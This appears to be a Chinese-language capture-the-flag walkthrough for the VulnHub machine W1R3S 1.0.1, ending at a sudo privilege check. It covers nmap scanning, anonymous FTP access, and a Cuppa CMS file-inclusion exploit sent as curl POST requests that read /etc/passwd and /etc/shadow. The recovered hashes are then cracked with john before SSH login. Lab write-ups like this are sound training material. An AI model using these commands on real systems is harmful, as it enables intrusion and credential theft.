W1R3S 1.0.1

# 靶机下载

vulnhub -> W1R3S 1.0.1

# nmap扫描收集信息

## 主机发现

**-sn**参数，仅探活主机

`nmap -sn 192.168.1.0/24`

通过对比新增主机，可以确定192.168.1.14是靶机

## 扫描开放端口

`nmap -sT --min-rate 10000 -p- 192.168.1.14 -oA ./port`

**-sT**参数是通过完整的tcp连接过程来确定端口开放状态，结果更准确也更隐蔽。**--min-rate**参数指定扫描速率，取准确度跟速度的平衡值。**-p-**参数指定扫描所有端口。**-oA**参数将结果输出成三种格式的文件，方便后面查看。

## 扫描详细信息

`nmap -sT -sC -sV -O 192.168.1.14 -p21,22,80,3306 -oA ./detail`

## 扫udp端口开放情况

`nmap -sU --top-ports 20 192.168.1.14`

## 脚本扫描

`nmap --script=vuln -p21,22,80,3306 192.168.1.14 -oA ./vuln`

## 确定任务优先级

21端口跑的是ftp服务而且可以匿名登录，可能有信息泄露。22端口跑的ssh，爆破进去的希望不大，优先级往后排。80端口跑的http，比较重要。3306端口跑的mysql，可以尝试去登录一下。优先级21，3306，80，22.

## ftp渗透

ftp 192.168.1.14

利用anonymous登录

利用get把文件都下载下来，注意进去ftp后先执行binary命令可以保证下载下来的文件不会损坏

这个泄露了员工姓名和对应职位，其他的文件都没看出什么信息

## 尝试登录mysql

不允许远程登录（这里我网络环境变了，靶机ip也变了）

## 渗透80端口

 前面得到wordpress页面，拼接访问

无论点击哪个按钮都会跳转到localhost

扫目录，看看有没有新的突破口

`dirsearch -u http://192.168.128.58 --json-report=result`

得到很多路径，拼接访问。有个cuppa cms的安装页面

点击next往下安装，安装成功但是创建用户失败

 查有没有历史漏洞

`searchsploit cuppa cms`

把exp复制到当前目录

`searchsploit -m 25971.txt`

 里面列出访问路径，漏洞出现行，文件包含漏洞，exp示范。有本地任意文件包含，能实现任意文件读取

尝试拼接访问，404

 往administrator目录后拼接，404

删掉/cuppa后往administrator拼接，访问成功但是没内容返回

到网上找cms源码看看

 要post方式传参

`curl -X POST http://192.168.128.58/administrator/alerts/alertConfigField.php -d "urlConfig=../../../../../../../../../etc/passwd"`

`curl -X POST http://192.168.128.58/administrator/alerts/alertConfigField.php -d "urlConfig=../../../../../../../../../etc/shadow"`

将有哈希的保存到一个文件，然后用john爆破，`john shadowtest --wordlist /usr/share/wordlists/rockyou.txt`。等待运行完毕使用`john --show shadow文件名`查看

## ssh连接

得到密码后通过ssh连接靶机，`ssh username@ip`

查看当前权限,可以看到用sudo命令权限

`id`

查看可以sudo执行的命令，3个ALL相当于root权限

`sudo -l`